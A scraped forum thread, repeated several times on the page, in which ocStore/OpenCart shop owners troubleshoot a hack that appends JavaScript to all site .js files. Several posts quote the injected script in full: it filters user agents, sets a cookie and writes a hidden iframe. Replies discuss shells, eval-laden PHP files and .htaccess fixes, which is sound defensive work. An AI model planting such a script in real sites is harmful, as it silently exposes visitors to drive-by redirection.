Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
Strelez Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 на вашем аккаунте случайно нет сайтов на джумле или дле? Если есть, то ищите дыры там Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал. Надіслати Поділитися на інших сайтах More sharing options...
Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Не факт. Описанная выше проблема у меня произошла на open slaed. Причину я указал. я бы мог конечно назвать и другие CMS , но боюсь , что не хватит места на форуме.. просто привел пример.. :-) Надіслати Поділитися на інших сайтах More sharing options...
Strelez Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Так ведь дело-то не в cms, а в способе и пути проникновения вредоносного кода, ну и "чистоте" своего компьютера, конечно же :wink: Надіслати Поділитися на інших сайтах More sharing options...
colaweb Опубліковано: 14 жовтня 2013 Автор Share Опубліковано: 14 жовтня 2013 1. Почистил все файлы *.js 2. Поменял все пароли "Дырку" та и не нашел, посмотрю что завтра будет. Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 14 жовтня 2013 Автор Share Опубліковано: 14 жовтня 2013 1. Почистил все файлы *.js 2. Поменял все пароли "Дырку" та и не нашел, посмотрю что завтра будет. Не помогло. Опять во все *.js дописался вначале вредоносный код В файле ошибок появились записи: 2013-10-14 20:18:51 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:18:51 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:18:51 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 2013-10-14 20:44:55 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:44:55 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:44:55 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 2013-10-14 20:50:12 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:50:12 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:50:12 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 Что делать? Надіслати Поділитися на інших сайтах More sharing options... Thirdian Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Имхо, ищите шелл. Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 вот тут colaweb/public_html/honey/download/ посмотрите... лишнего ничего нет в папке? в крайнем случае обратитесь к хостеру... нормальный хостер подскажет от куда ноги растут Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... haykoar Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 (змінено) Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ У меня тоже была такая проблема. В аккаунте 8 сайтов, и все js файлы были заражены этим кодом. В сайтах все, что было связано с jquery, перестало работать. Разумеется, что удаление вреданосного кода бесполезно, потому что через 10 мин. код самостоятельно восстановливается. Я тоже долго искал дыру во всех сайтах аккаунта и нашел в папке "Images" сайта erevan-online.ru. Там в файле .htaccess я обнаружил обсалютный путь к файлу пароля моего аккаунта. Я заменил этот код на вот такой: <Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phps|phtml|shtml|py)$"> Deny from all </Files> Order allow,deny Deny from all Потом сменил пароль FTP аккаунта. А что произашло после этого, я не понял... В js файлах всех сайтов тот код, который я цитировал больше не было, они исчезали самостоятельно. Кто-то может обяснить как это произошло? Спасибо всем Змінено 23 жовтня 2013 користувачем afwollis unlinked Надіслати Поділитися на інших сайтах More sharing options... Zeppelin Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 для поиска заразы на хостинге хорошо подходит такой инструмент как AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге Надіслати Поділитися на інших сайтах More sharing options... Baco Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 23 жовтня 2013 Автор Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера... Надіслати Поділитися на інших сайтах More sharing options... Doktorsaitov Опубліковано: 29 жовтня 2013 Share Опубліковано: 29 жовтня 2013 ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику. Надіслати Поділитися на інших сайтах More sharing options... 1 month later... Pavel555 Опубліковано: 23 грудня 2013 Share Опубліковано: 23 грудня 2013 Тоже попалась эта зараза. Действовал так: удалил вредоносный код из всех .js в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla удалил все найденные php Надіслати Поділитися на інших сайтах More sharing options... 2 months later... Pavel555 Опубліковано: 23 березня 2014 Share Опубліковано: 23 березня 2014 В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата? Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... elitesmart Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 А разве оригинала у вас не осталось? База то не тронута, а сайт перезалейте, максимально оригинальными данными. Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 Идей много, вплоть до анализа логов доступа. Вам нужно лечить? или заниматься самолечением? Надіслати Поділитися на інших сайтах More sharing options... 1 month later... andreyvebuiskii Опубліковано: 19 травня 2014 Share Опубліковано: 19 травня 2014 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ Может это поможет? Вирусдай (писал обзор тут). Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки [Решено? {joomla}] Взлом магазина *.js Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000 × Уже зареєстровані? Ввійти Реєстрація Ваші замовлення Назад Придбані модулі та шаблони Ваші рахунки Лист очікувань Альтернативні контакти Форум Новини ocStore Назад Офіційний сайт Демо ocStore 3.0.3.2 Демо ocStore 2.3.0.2.4 Завантажити ocStore Документація Історія версій ocStore Блоги Модулі Шаблони Назад Безкоштовні шаблони Платні шаблони Де купувати модулі? Послуги FAQ OpenCart.Pro Назад Демо Купити Порівняння × Створити... Important Information На нашому сайті використовуються файли cookie і відбувається обробка деяких персональних даних користувачів, щоб поліпшити користувальницький інтерфейс. Щоб дізнатися для чого і які персональні дані ми обробляємо перейдіть за посиланням . Якщо Ви натиснете «Я даю згоду», це означає, що Ви розумієте і приймаєте всі умови, зазначені в цьому Повідомленні про конфіденційність. Я даю згоду
colaweb Опубліковано: 14 жовтня 2013 Автор Share Опубліковано: 14 жовтня 2013 1. Почистил все файлы *.js 2. Поменял все пароли "Дырку" та и не нашел, посмотрю что завтра будет. Не помогло. Опять во все *.js дописался вначале вредоносный код В файле ошибок появились записи: 2013-10-14 20:18:51 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:18:51 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:18:51 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 2013-10-14 20:44:55 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:44:55 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:44:55 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 2013-10-14 20:50:12 - PHP Warning: fopen(/home/c/cl39380/colaweb/public_html/honey/download/test) [<a href='function.fopen'>function.fopen</a>]: failed to open stream: Permission denied in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 99 2013-10-14 20:50:12 - PHP Warning: fclose(): supplied argument is not a valid stream resource in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 103 2013-10-14 20:50:12 - PHP Warning: sprintf() [<a href='function.sprintf'>function.sprintf</a>]: Too few arguments in /home/c/cl39380/colaweb/public_html/honey/admin/controller/common/home.php on line 106 Что делать? Надіслати Поділитися на інших сайтах More sharing options... Thirdian Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Имхо, ищите шелл. Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 вот тут colaweb/public_html/honey/download/ посмотрите... лишнего ничего нет в папке? в крайнем случае обратитесь к хостеру... нормальный хостер подскажет от куда ноги растут Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... haykoar Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 (змінено) Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ У меня тоже была такая проблема. В аккаунте 8 сайтов, и все js файлы были заражены этим кодом. В сайтах все, что было связано с jquery, перестало работать. Разумеется, что удаление вреданосного кода бесполезно, потому что через 10 мин. код самостоятельно восстановливается. Я тоже долго искал дыру во всех сайтах аккаунта и нашел в папке "Images" сайта erevan-online.ru. Там в файле .htaccess я обнаружил обсалютный путь к файлу пароля моего аккаунта. Я заменил этот код на вот такой: <Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phps|phtml|shtml|py)$"> Deny from all </Files> Order allow,deny Deny from all Потом сменил пароль FTP аккаунта. А что произашло после этого, я не понял... В js файлах всех сайтов тот код, который я цитировал больше не было, они исчезали самостоятельно. Кто-то может обяснить как это произошло? Спасибо всем Змінено 23 жовтня 2013 користувачем afwollis unlinked Надіслати Поділитися на інших сайтах More sharing options... Zeppelin Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 для поиска заразы на хостинге хорошо подходит такой инструмент как AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге Надіслати Поділитися на інших сайтах More sharing options... Baco Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Надіслати Поділитися на інших сайтах More sharing options... colaweb Опубліковано: 23 жовтня 2013 Автор Share Опубліковано: 23 жовтня 2013 Смотрите в папку download, не завалялся ли там шелл, у меня недавно мультимагазин со всеми вытекающими так был заражен, все js-ки инфицированы, и всё из-за дыры в TinyMCE в джумле, что на соседнем домене и том же хосте стояла, грохнули и тишина. Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . Надіслати Поділитися на інших сайтах More sharing options... Гість Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 Шеллы сидели в Joomle. Почистил все файлы .php где был код с eval(.. Пока все тихо, ищу "дырку" . вот об этом я вам и писал ранее... а дырку ищите в правах доступа к файлам и папкам... и сделайте дополнительную авторизацию для админки на уровне сервера... Надіслати Поділитися на інших сайтах More sharing options... Doktorsaitov Опубліковано: 29 жовтня 2013 Share Опубліковано: 29 жовтня 2013 ТС скрипт который вы использовали ищет самое популярное из вредоносных кодов (говорю по опыту), проблема в следующий раз просто усложниться. Постарайтесь глазами пройтись по коду вашего сайта. Так же хотел обратить внимание, что и хостинг играет большую роль, точнее его натсройка, как выше говорили вам указать права на папки и файлы - это может не помочь, если не будут правильно выставлены настройки сервера их просто будут менять на те, котоыре нужны злоумшлинику. Надіслати Поділитися на інших сайтах More sharing options... 1 month later... Pavel555 Опубліковано: 23 грудня 2013 Share Опубліковано: 23 грудня 2013 Тоже попалась эта зараза. Действовал так: удалил вредоносный код из всех .js в access_log поискал все, что содержит "js", среди результатов внимание привлекли запросы POST с именем файла 6a442.php поискал по всем файлам на сервере по содержимому вышеуказанного php, поиск дал еще 95 файлов с таким же содержимым в разных папках joomla удалил все найденные php Надіслати Поділитися на інших сайтах More sharing options... 2 months later... Pavel555 Опубліковано: 23 березня 2014 Share Опубліковано: 23 березня 2014 В общем, вышеуказонный метод помогает, но ненадолго. Через неделю-другую вредоносный код появляется снова. Зараженные файлы лечу снова, но видимо вирус где-то остается недочищенным. У кого какие идеи, как дочистить супостата? Надіслати Поділитися на інших сайтах More sharing options... 2 weeks later... elitesmart Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 А разве оригинала у вас не осталось? База то не тронута, а сайт перезалейте, максимально оригинальными данными. Надіслати Поділитися на інших сайтах More sharing options... chukcha Опубліковано: 6 квітня 2014 Share Опубліковано: 6 квітня 2014 Идей много, вплоть до анализа логов доступа. Вам нужно лечить? или заниматься самолечением? Надіслати Поділитися на інших сайтах More sharing options... 1 month later... andreyvebuiskii Опубліковано: 19 травня 2014 Share Опубліковано: 19 травня 2014 Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ Может это поможет? Вирусдай (писал обзор тут). Надіслати Поділитися на інших сайтах More sharing options... Створіть аккаунт або увійдіть для коментування Ви повинні бути користувачем, щоб залишити коментар Створити обліковий запис Зареєструйтеся для отримання облікового запису. Це просто! Зареєструвати аккаунт Вхід Уже зареєстровані? Увійдіть тут. Вхід зараз Share More sharing options... Передплатники 0 Перейти до списку тем Зараз на сторінці 0 користувачів Ні користувачів, які переглядиють цю сторінку Последние темы Последние дополнения Последние новости Вся активність Головна Підтримка та відповіді на запитання. Питання безпеки [Решено? {joomla}] Взлом магазина *.js Покупцям Оплата розширень фізичними особами Оплата розширень юридичними особами Політика повернень Розробникам Регламент розміщення розширень Регламент продажу та підтримки розширень Віртуальний обліковий запис автора Політика просування оголошень API каталогу розширень Вирішення спорів щодо авторських прав Корисна інформація Публічна оферта Політика повернень Політика конфіденційності Платіжна політика Політика передачі особистих даних Політика прозорості Останні розширення PRICE MASTER - Модуль імпорту/експорту товарів, парсинг, переклад, генерація текстів, редактор каталогу та багато іншого Автор: ScriptBrains 1.0 Синхронізація Замовлень Rozetka.ua та Opencart Автор: sinco Product Manipulator Автор: Hiperlynx007 Видалення дублікатів товарів для OpenCart Автор: Hatshypsut Вибір категорій і виробників для "Знайшли дешевше" шаблону Upstore Автор: Flint2000
Thirdian Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 Имхо, ищите шелл. Надіслати Поділитися на інших сайтах More sharing options...
Гість Опубліковано: 14 жовтня 2013 Share Опубліковано: 14 жовтня 2013 вот тут colaweb/public_html/honey/download/ посмотрите... лишнего ничего нет в папке? в крайнем случае обратитесь к хостеру... нормальный хостер подскажет от куда ноги растут Надіслати Поділитися на інших сайтах More sharing options...
haykoar Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 (змінено) Здравствуйте, борюсь второй день. Ищу дырку в ocStore 1.5.4.1.2 через которую злоумышленник добавляет во все файлы с расширением .js в папке catalog/view/javascript/ вот этот код: //beleiad9 (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = 'Linux|Macintosh|FreeBSD|Chrome|iPad|iPhone|IEMobile|Android|Firefox/18.0|Firefox/18.0.1|Firefox/18.0.2|Firefox/19.0|Firefox/19.0.1|Firefox/19.0.2|Firefox/20.0|Firefox/21.0|Firefox/22.0|Firefox/23.0|Firefox/24.0|Maxthon|YandexNews|bingbot|YandexAntivirus|Chromium|Googlebot|Wget|YandexBot|Googlebot-Image|msnbot-media|SymbianOS|Mini|YandexDirect|MRSPUTNIK'; blackList = blackList.split('|'); var blackUA = false; for (var i in blackList) { if (stripos(navigator.userAgent, blackList[i])!==false) { blackUA = true; break; } } return blackUA; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\/\+^])/g, '$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('nirajo819fyau82'); if (cookie == undefined) { setCookie('nirajo819fyau82', true, 86400); document.write('<iframe src="http://search.yahoo.com" style="position:absolute;left:-900px;top:-900px;" height="110" width="110"></iframe>'); } }; })(); //kolamne817 Может кто то уже сталкивался с подобной проблемой, поделитесь пожалуйста, откуда ноги растут. магазин http://colaweb.ru/honey/ У меня тоже была такая проблема. В аккаунте 8 сайтов, и все js файлы были заражены этим кодом. В сайтах все, что было связано с jquery, перестало работать. Разумеется, что удаление вреданосного кода бесполезно, потому что через 10 мин. код самостоятельно восстановливается. Я тоже долго искал дыру во всех сайтах аккаунта и нашел в папке "Images" сайта erevan-online.ru. Там в файле .htaccess я обнаружил обсалютный путь к файлу пароля моего аккаунта. Я заменил этот код на вот такой: <Files ~ "\.(php|cgi|pl|php3|php4|php5|php6|phps|phtml|shtml|py)$"> Deny from all </Files> Order allow,deny Deny from all Потом сменил пароль FTP аккаунта. А что произашло после этого, я не понял... В js файлах всех сайтов тот код, который я цитировал больше не было, они исчезали самостоятельно. Кто-то может обяснить как это произошло? Спасибо всем Змінено 23 жовтня 2013 користувачем afwollis unlinked Надіслати Поділитися на інших сайтах More sharing options...
Zeppelin Опубліковано: 23 жовтня 2013 Share Опубліковано: 23 жовтня 2013 для поиска заразы на хостинге хорошо подходит такой инструмент как AI-Bolit — это уникальный бесплатный скрипт для поиска вирусов, троянов, backdoor, хакерских активностей на хостинге Надіслати Поділитися на інших сайтах More sharing options...
